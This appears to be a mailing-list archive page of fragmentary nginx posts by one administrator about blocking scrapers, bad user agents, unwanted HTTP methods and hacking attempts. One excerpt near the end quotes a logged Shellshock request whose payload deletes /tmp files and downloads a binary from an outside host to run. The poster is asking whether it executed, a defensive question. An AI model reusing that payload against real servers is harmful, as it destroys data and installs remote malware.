I am presently using a scheme like this to prevent scraping documents.
location /images/ {
valid_referers none blocked www.example.com example.com forums.othersite.com ;
# you can tell the browser that it can only download content from the
On Mon, 20 Jun 2022 17:23:23 -0400
"_lukman_" wrote:
> server
> {
> listen 443 default_server ssl;
> listen [::]:443 ssl http2;
> server_name dummysite.io www.dummysite.io;
> ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; #
> managed by Certbot
>
ry to
> interpolate these, and thus be vulnerable to the exploit.
>
> On Mon, 20 Dec 2021 at 04:02, li...@lazygranch.com
> wrote:
>
> > I don't have any service using java so I don't believe I am subject
> > to this exploit. However I am confused why a returned a 200 for
>
I don't have any service using java so I don't believe I am subject to
this exploit. However I am confused why a returned a 200 for this
request. The special characters in the URL are confusing.
200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET / HTTP/1.1" 706
I insist on encryption so this is what I use:
server {
listen 80;
server_name yourdomain.com www.yourdomain.com ;
if ($request_method !~ ^(GET|HEAD)$ ) {
return 444;
}
return 301 https://$host$request_uri;
}
I only serve static pages so I use
Answers intermixed below.
On Wed, 11 Mar 2020 21:23:15 -0400
"MAXMAXarena" wrote:
> Hello @Ralph Seichter,
> what do you mean by "mutually exclusive"?
> As for the tools I mentioned, it was just an example.
> Are you telling me I can't solve this problem?
>
>
> Hello @garic,
> thanks for this
On Fri, 08 Mar 2019 10:42:28 -0500
"wkbrad" wrote:
> Thanks for that info. It's definitely harder to notice the issue on
> small servers like that. But you are still seeing about a 50%
> increase in ram usage there by your own tests.
>
> The smallest server I've tested this on uses about 20M
On Thu, 07 Mar 2019 13:33:39 -0500
"wkbrad" wrote:
> Hi all,
>
> I just wanted to share the details of what I've found about this
> issue. Also thanks to Maxim Dounin and Reinis Rozitis who gave some
> really great answers!
>
> The more I look into this the more I'm convinced this is an issue
On Thu, 10 Jan 2019 08:50:33 +
Francis Daly wrote:
> On Wed, Jan 09, 2019 at 06:14:04PM -0800, li...@lazygranch.com wrote:
>
> Hi there,
>
> > location / {
> > if ($badagent) { return 403; }
> > }
> > location = /feeds {
>
On Wed, 9 Jan 2019 08:20:05 +
Francis Daly wrote:
> On Tue, Jan 08, 2019 at 07:30:44PM -0800, li...@lazygranch.com wrote:
>
> Hi there,
>
> > Stripping down the nginx.conf file:
> >
> > server{
> > location / {
> > root
I have a map to check for bad user agents called badagent. I want to
set up a RSS feed. The feedreaders can have funny agents, so I need to
omit the bad agent check if the file is any xml type.
This is rejected.
if (($request_uri != [*.xml]) && ($badagent)) {return 444; }
Suggestions?
The centos nginx from the repo lacks ngx_http_hls_module. This is a
technique to add the module without compilation.
https://dzhorov.com/2017/04/compiling-dynamic-modules-into-nginx-centos-7
Does anyone have experience with this? I'd like to avoid building nginx
from scratch to make the updates
On Tue, 20 Mar 2018 13:03:09 +
"Friscia, Michael" wrote:
> This is great, thank you again, this is a huge jumpstart!
Per NIST best practices, you should limit the HTML verbs that you
allow. A very simple website can run on just GET and HEAD. Here is how
you 444
On Mon, 19 Mar 2018 12:31:20 +
"Friscia, Michael" wrote:
> Just a thought before I start crafting one. I am creating a
> location{} block with the intention of populating it with a ton of
> requests I want to terminate immediately with a 444 response. Before
> I
I had a few neurons fire. I forgot nginx can load dynamic modules.
https://www.nginx.com/blog/nginx-dynamic-modules-how-they-work/
I haven't done this myself, so you are on your own at this point.
On Fri, 09 Mar 2018 11:59:30 -0500
"neuronetv" wrote:
> I've
On Fri, 23 Feb 2018 18:54:48 -0800
"li...@lazygranch.com" <li...@lazygranch.com> wrote:
> On Thu, 22 Feb 2018 18:40:12 -0800
> "li...@lazygranch.com" <li...@lazygranch.com> wrote:
>
> > When I was using FreeBSD, the access log was real time
Presently I'm putting maps in the server location. Can they be put in
the very top to make them work for all servers? If not, I can just make
the maps into include files and insert as needed, but maybe making the
map global is more efficient.
<aroz...@nginx.com> wrote:
> Hi,
>
> have you checked this with disabled selinux ?
>
> br,
> Aziz.
>
>
>
>
>
> > On 20 Dec 2017, at 11:07, li...@lazygranch.com wrote:
> >
> > I'm setting up a web server on a Centos 7 VPS. I'm relat
I'm setting up a web server on a Centos 7 VPS. I'm relatively sure I
have the firewalls set up properly since I can see my browser requests
in the access and error log. That said, I have file permission problem.
nginx 1.12.2
Linux servername 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50
Here is a log of real life IP limiting with a 30 connection limit:
86.184.152.14 British Telecommunications PLC
8.37.235.199 Level 3 Communications Inc.
130.76.186.14 The Boeing Company
security.5.bz2:Nov 29 20:50:53 theranch kernel: ipfw: 5005 drop session type 40
86.184.152.14 58714 -> myip
I'm curious why this request got a 400 response rather than a 404.
400 123.160.235.162 - - [16/Jul/2017:22:56:30 +] "GET /currentsetting.htm HTTP/1.1" 173 "-" "-" "-"
log_format main '$status $remote_addr - $remote_user [$time_local] "$request" '
'$body_bytes_sent
On Thu, 13 Jul 2017 23:46:12 +0100
Francis Daly wrote:
> On Thu, Jul 13, 2017 at 09:37:08AM -0400, Viaduct Lists wrote:
>
> Hi there,
>
> > [Wed Jul 12 06:08:41 rich@neb /var/log/nginx] nginx -t
>
> If you were running this command as "root", would that prompt say
>
I'm sending 403 responses now, so I screwed up by mistaking the fields
in the logs. I'm going back to lurking mode again with my tail
shamefully between my legs.
This code in the image location section will block the google app:
if ($http_user_agent ~*
Actually I think I was mistaken and the field is the user agent. I will
change the variable and see what happens. I did some experiments to
show the pattern match works.
On Tue, 20 Jun 2017 20:56:46 -0700
li...@lazygranch.com wrote:
> I want to block by referrer. I provided a more &quo
On Tue, 20 Jun 2017 17:49:14 -0700
Robert Paprocki <rpapro...@fearnothingproductions.net> wrote:
> Do you mean $http_user_agent?
>
> > On Jun 20, 2017, at 17:36, "li...@lazygranch.com"
> > <li...@lazygranch.com> wrote:
> >
> > I would
I would like to block the google app from directly downloading images.
access.log:
200 186.155.157.9 - - [20/Jun/2017:00:35:47 +] "GET /images/photo.jpg HTTP/1.1" 334052 "-" "com.google.GoogleMobile/28.0.0 iPad/9.3.5 hw/iPad2_5" "-"
My nginx code in the images location:
if
Here is the map. I truncated my bad agent list, but will get you
started. I used the user agent changer in Chromium to make sure it
worked. -
map $http_user_agent $badagent {
default 0;
~*WordPress
A bit OT, but can a guru verify I rejected all these proxy attempts.
I'm 99.9% sure, but I'd hate to allow some spammer or worse to route
through my server. The only edit I made is when they ran my IP address
through a forum spam checker. (I assume google indexes pastebin.)
I keep my nginx server set up dumb. (Don't need anything fancy at the
moment). Is this request below possibly valid? I flag anything with a
question mark in it as hacking, but maybe IOS makes some requests that
some websites will process, and others would just ignore after the
question mark.
444
I only serve static pages, hence I have this in my conf file:
---
## Only allow these request methods ##
if ($request_method !~ ^(GET|HEAD)$ ) {
return 444;
}
Shouldn't the return code be 444 instead of 400?
On Sat, 22 Oct 2016 17:40:56 -0400
"itpp2012" wrote:
> The idea is nice but pointless, if you maintain this list over 6
> months you most likely will end up blocking just about everyone.
>
> Stick to common sense with your config, lock down nginx and the
> backends,
http://pastebin.com/7W0uDrLa
If you need an extensive list of hacker requests (over 200), I put this
log entry on pastebin. As mentioned at the top of the pastebin, the
hacker used my IP address directly rather than my domain name.
I have a "map" that detects typical hacker activity. Perhaps in
http://pastebin.com/tZZg3RbA/?e=1
This is the access.log file data relevant to that fake googlebot. It
starts with a fake googlebot entry, then goes downhill from there. I
rate limit at 10/s. I only allow the verbs HEAD and GET, so the POST
went to 444 directly.
I replaced the domain with a fake
I got a spoofed googlebot hit. It was easy to detect since there were
probably a hundred requests that triggered my hacker detection map
scheme. Only two requests received a 200 return and both were harmless.
200 118.193.176.53 - - [25/Sep/2016:17:45:23 +] "GET / HTTP/1.1" 847 "-"
should try to duplicate this in the event it has something
to do with my setup.
On Mon, 12 Sep 2016 15:30:01 -0700
li...@lazygranch.com wrote:
> Most of the chatter on the interwebs believes that the rate limit is
> per connection, so if some IP opens up multiple connections, they get
Link goes to conf file
https://www.dropbox.com/s/1gz5139s4q3b7e0/nginx.conf?dl=0
On Tue, 23 Aug 2016 20:51:55 +0300
"Reinis Rozitis" wrote:
> > Configuration file included in the post. I already checked it.
>
> You have shown only few excerpts (like there might be other
>
Nginx 1.10.1,2
FreeBSD 10.2-RELEASE-p18 #0: Sat May 28 08:53:43 UTC 2016
I'm using the "map" module to detect obvious hacking by detecting
keywords. (Yes, I know about Naxsi.) Finding the really dumb hacks is
easy. I give them a 444 return code with the idea being I can run a
script on the log
On Sat, 30 Jul 2016 23:49:30 +0300
"Valentin V. Bartenev" <vb...@nginx.com> wrote:
> On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote:
> > On Sat, 30 Jul 2016 13:18:47 +0300
> > "Valentin V. Bartenev" <vb...@nginx.com> wrote
I see a return code of 200. Does that mean this script was executed?
-
219.153.48.45 - - [30/Jul/2016:07:40:07 +] "GET / HTTP/1.1" 200 643
"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget
http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
>> /tmp/Run.sh;echo
On Sat, 30 Jul 2016 13:18:47 +0300
"Valentin V. Bartenev" <vb...@nginx.com> wrote:
> On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > I see a fair amount of hacking attempts in the access.log. That is,
> > they
> show up with a return